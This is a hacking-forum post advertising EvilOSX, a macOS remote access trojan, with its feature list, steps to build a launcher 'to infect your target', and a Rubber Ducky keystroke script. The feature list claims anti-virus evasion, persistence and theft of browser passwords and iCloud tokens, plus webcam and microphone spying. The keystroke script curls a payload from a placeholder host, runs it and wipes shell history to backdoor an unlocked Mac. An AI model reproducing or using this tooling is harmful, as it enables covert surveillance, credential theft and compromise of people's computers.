Jump to content
Fi8sVrs

EvilOSX - pure python, post-exploitation, RAT (Remote Administration Tool) for macOS / OSX.

By Fi8sVrs, in Programe hacking

Recommended Posts

  • Active Members
Fi8sVrs Rookie

Fi8sVrs

Posted
  • Active Members
Posted

68747470733a2f2f692e696d6775722e636f6d2f

 

EvilOSX

A pure python, post-exploitation, RAT (Remote Administration Tool) for macOS / OSX.

 

Features

  • Emulate a simple terminal instance
  • Undetected by anti-virus (OpenSSL AES-256 encrypted payloads, HTTPS communication)
  • Multi-threaded
  • No client dependencies (pure python)
  • Persistent
  • Simple extendable module system
  • Retrieve Chrome passwords
  • Retrieve iCloud tokens and contacts
  • Phish for iCloud passwords via iTunes
  • Download and upload files
  • Take a picture using the webcam
  • Record microphone input
  • iTunes iOS backup enumeration
  • Retrieve or monitor the clipboard
  • Retrieve browser history (Chrome and Safari)
  • Attempt to get root via local privilege escalation
  • Auto installer, simply run EvilOSX on your target and the rest is handled automatically

 

How To Use

The server side requires python3 to run (probably already installed on your system). 

# Clone or download this repository
$ git clone https://github.com/Marten4n6/EvilOSX

# Install dependencies required by the server
$ sudo pip3 install -r requirements.txt

# Go into the repository
$ cd EvilOSX

# Build a launcher to infect your target
$ python builder.py

# Start listening for connections
$ python start.py

# Lastly, run the built launcher on your target

Because payloads are created unique to the target system (automatically by the server), the server must be running when any client connects for the first time.

 

Screenshots

68747470733a2f2f692e696d6775722e636f6d2f

 

68747470733a2f2f692e696d6775722e636f6d2f

 

Motivation

This project was created to be used with my Rubber Ducky, here's the simple script: 

REM Download and execute EvilOSX @ https://github.com/Marten4n6/EvilOSX
REM Also see https://ducktoolkit.com/vidpid/

DELAY 1000
GUI SPACE
DELAY 500
STRING Termina
DELAY 1000
ENTER
DELAY 1500

REM Kill all terminals after x seconds
STRING screen -dm bash -c 'sleep 6; killall Terminal'
ENTER

STRING cd /tmp; curl -s HOST_TO_EVILOSX.py -o 1337.py; python 1337.py; history -cw; clear
ENTER
  • Takes about 10 seconds to backdoor any unlocked Mac, which is...... nice
  • Terminal is spelt that way intentionally, on some systems spotlight won't find the terminal otherwise.
  • To bypass the keyboard setup assistant make sure you change the VID&PID which can be found here. Aluminum Keyboard (ISO) is probably the one you are looking for.

 

 

Source

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...